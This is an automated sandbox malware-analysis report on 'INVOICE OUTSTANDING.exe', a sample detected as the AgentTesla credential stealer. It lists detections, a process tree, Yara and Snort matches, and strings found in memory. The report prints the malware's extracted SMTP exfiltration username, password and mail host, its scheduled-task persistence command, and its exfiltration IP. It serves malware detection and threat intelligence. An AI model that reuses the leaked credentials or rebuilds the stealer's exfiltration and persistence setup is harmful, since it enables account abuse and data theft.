Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE OUTSTANDING.exe

Overview

General Information

Sample Name:INVOICE OUTSTANDING.exe
Analysis ID:680571
MD5:0fa9d94d6393235f67a17b220902dbfa
SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • INVOICE OUTSTANDING.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe" MD5: 0FA9D94D6393235F67A17B220902DBFA)
    • BackgroundTransferHost.exe (PID: 5816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • schtasks.exe (PID: 5816 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 5364 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kECjS.exe (PID: 5912 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kECjS.exe (PID: 2756 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x97da1:$a13: get_DnsResolver
      • 0xcbbc1:$a13: get_DnsResolver
      • 0x965eb:$a20: get_LastAccessed
      • 0xca40b:$a20: get_LastAccessed
      • 0x98734:$a27: set_InternalServerPort
      • 0xcc554:$a27: set_InternalServerPort
      • 0x98a51:$a30: set_GuidMasterKey
      • 0xcc871:$a30: set_GuidMasterKey
      • 0x966f2:$a33: get_Clipboard
      • 0xca512:$a33: get_Clipboard
      • 0x96700:$a34: get_Keyboard
      • 0xca520:$a34: get_Keyboard
      • 0x979a7:$a35: get_ShiftKeyDown
      • 0xcb7c7:$a35: get_ShiftKeyDown
      • 0x979b8:$a36: get_AltKeyDown
      • 0xcb7d8:$a36: get_AltKeyDown
      • 0x9670d:$a37: get_Password
      • 0xca52d:$a37: get_Password
      • 0x9717d:$a38: get_PasswordHash
      • 0xcaf9d:$a38: get_PasswordHash
      • 0x981ac:$a39: get_DefaultCredentials
      00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_e577e17eunknownunknown
      • 0x70445:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      • 0xa4265:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          14.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            14.0.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
            • 0x324f0:$s10: logins
            • 0x31f4c:$s11: credential
            • 0x2e54a:$g1: get_Clipboard
            • 0x2e558:$g2: get_Keyboard
            • 0x2e565:$g3: get_Password
            • 0x2f7ef:$g4: get_CtrlKeyDown
            • 0x2f7ff:$g5: get_ShiftKeyDown
            • 0x2f810:$g6: get_AltKeyDown
            14.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
            • 0x2fbf9:$a13: get_DnsResolver
            • 0x2e443:$a20: get_LastAccessed
            • 0x3058c:$a27: set_InternalServerPort
            • 0x308a9:$a30: set_GuidMasterKey
            • 0x2e54a:$a33: get_Clipboard
            • 0x2e558:$a34: get_Keyboard
            • 0x2f7ff:$a35: get_ShiftKeyDown
            • 0x2f810:$a36: get_AltKeyDown
            • 0x2e565:$a37: get_Password
            • 0x2efd5:$a38: get_PasswordHash
            • 0x30004:$a39: get_DefaultCredentials
            14.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_AgentTesla_e577e17eunknownunknown
            • 0x829d:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
            Click to see the 10 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.343.255.154.57497635872839723 08/08/22-20:20:11.732977
            SID:2839723
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872851779 08/08/22-20:20:11.733160
            SID:2851779
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872840032 08/08/22-20:20:11.733160
            SID:2840032
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872030171 08/08/22-20:20:11.732977
            SID:2030171
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: INVOICE OUTSTANDING.exeReversingLabs: Detection: 37%
            Antivirus / Scanner detection for submitted sample
            Source: INVOICE OUTSTANDING.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeAvira: detection malicious, Label: HEUR/AGEN.1235476
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeReversingLabs: Detection: 37%
            Machine Learning detection for sample
            Source: INVOICE OUTSTANDING.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJoe Sandbox ML: detected
            Source: 14.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
            Source: INVOICE OUTSTANDING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: INVOICE OUTSTANDING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_08324450
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_08324440

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49763 -> 43.255.154.57:587
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewIP Address: 43.255.154.57 43.255.154.57
            Source: global trafficTCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
            Source: global trafficTCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.oceanskylogistics.in
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wITvjB.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comand
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.C
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlM
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/pC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comaCC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalicCC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom/pC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueed
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comic
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn-u
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cr%X
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-s
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-f
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microft.c
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.K
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comdif
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kre
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlic
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://Vvf6edm0NHgn8Mct.com
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: mail.oceanskylogistics.in

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
